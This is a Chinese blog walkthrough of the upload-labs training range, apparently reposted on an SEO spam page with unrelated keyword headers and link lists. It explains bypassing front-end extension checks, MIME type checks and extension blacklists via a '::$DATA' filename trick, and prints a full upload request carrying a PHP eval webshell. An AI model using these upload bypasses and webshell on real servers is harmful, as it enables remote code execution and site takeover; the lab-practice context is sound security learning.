当前位置: 首页 > news >正文

衡水网站制作报价四年级的简短新闻播报

衡水网站制作报价,四年级的简短新闻播报,http://www.qdgw.edu.cn/ 网站建设综合实训,石家庄做家教网站upload-labs靶场 第一关 绕过前端 先打开哥斯拉,生成木马,选择php 打开brup开浏览器,上传文件,就会发现被阻止了,还没抓到包呢 那就是被前端代码阻止了,那通常前端代码都只能防御后缀名 我们抓到包后直…

upload-labs靶场

第一关  绕过前端

先打开哥斯拉,生成木马,选择php

打开brup开浏览器,上传文件,就会发现被阻止了,还没抓到包呢

那就是被前端代码阻止了,那通常前端代码都只能防御后缀名

我们抓到包后直接改回名称即可

那就先复制木马文件,再改成 .png 图片格式结尾

然后打开抓包,上传绕过前端,就能看到抓去的数据包了

改回去php即可

右键查看一下图片,就会发现图片地址都给我们了

# 所以木马位置在这里
http://127.0.0.1/upload-labs-master/upload/gesila.php

上哥斯拉测试连接,没毛病,下一题

第二关  绕过后端的类型判断

第二关可以用第一关的方法,但不知道为什么可以,于是看了一下源码,原来是类型绕过了

上传图片的时候,类型自动是图片类型,而这关可以直接用php文件上传

抓包改成图片类型就行了,连后缀名都不需要改

第三关  隐藏流文件双写绕过

上传木马文件,数据包增加下面东西,其实我也没看太懂

但可能会是一个比较实用的技巧

因为我看了一下源代码,源码是用php代码写常量数组判断后缀名是否在数组的后缀名中

所以这是很常见的防御写法这种破解应该是比较实用

完整数据包如下:

POST /upload-labs-master/Pass-03/index.php?action=show_code HTTP/1.1
Host: 127.0.0.1
Content-Length: 348
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryRSR1Z7D37x0XoKBw
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/upload-labs-master/Pass-03/index.php?action=show_code
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ahreltidkjthrep12lbfgq9got
Connection: close------WebKitFormBoundaryRSR1Z7D37x0XoKBw
Content-Disposition: form-data; name="upload_file"; filename="gesila.php::$DA::$DATATA"
Content-Type: application/octet-stream<?php
eval($_POST["pass"]);------WebKitFormBoundaryRSR1Z7D37x0XoKBw
Content-Disposition: form-data; name="submit"涓婁紶
------WebKitFormBoundaryRSR1Z7D37x0XoKBw--

上传之后需要查看文件名是什么?不然没法搞

这个文件名一半看懂,一半没看懂,原理也没查到

反正前面就是年月日,后面一半就不知道是什么来的了,所以需要看到有文件名才能getshell

http://www.ds6.com.cn/news/103098.html

相关文章:

  • 烟台门户网站开发全网优化推广
  • 南通做网站找谁seo建站公司
  • 精品资料网官方网站网络营销做得好的酒店
  • 邵阳网站建设公司今天重要新闻
  • 电脑网站搜索如何做时事新闻热点
  • 龙华住房和建设局网站官网网站404页面怎么做
  • 网站建设架构什么是软文营销?
  • 湖南网站建设网络公司郑州seo
  • 做动漫网站要多少钱山东搜索引擎优化
  • 本地做网站企业培训师资格证
  • 复制一个网站怎么做的如何联系百度人工客服
  • 西乡做网站哪家便宜免费推广软件工具
  • 大庆做网站公司百度云网页版登录入口
  • 深圳网站建设10强青海seo技术培训
  • 湖州做网站推广的公司semiconductor是什么意思
  • 直接做海报的网站软文广告案例分析
  • 国家高新技术企业认定管理工作网一键优化
  • 做古玩的网站软文写作是什么
  • 网站建设平台方案设计推荐就业的培训机构
  • 移动网站建设商什么是seo搜索优化
  • 做网站郑州设计师经常用的网站
  • 贵阳网站建设培训学校佛山百度快照优化排名
  • 网站建设会计科目google海外推广
  • 一个优秀的个人网站百度快照的作用是什么
  • 婚纱网站建设目的免费域名申请网站大全
  • 减肥单页网站合肥全网优化
  • 邯郸做移动网站价格黄山网络推广公司
  • 公司网站备案信息查询网站如何优化排名
  • 桐梓住房和城乡建设部网站如何推广引流
  • 河南省建设厅网网站免费建站有哪些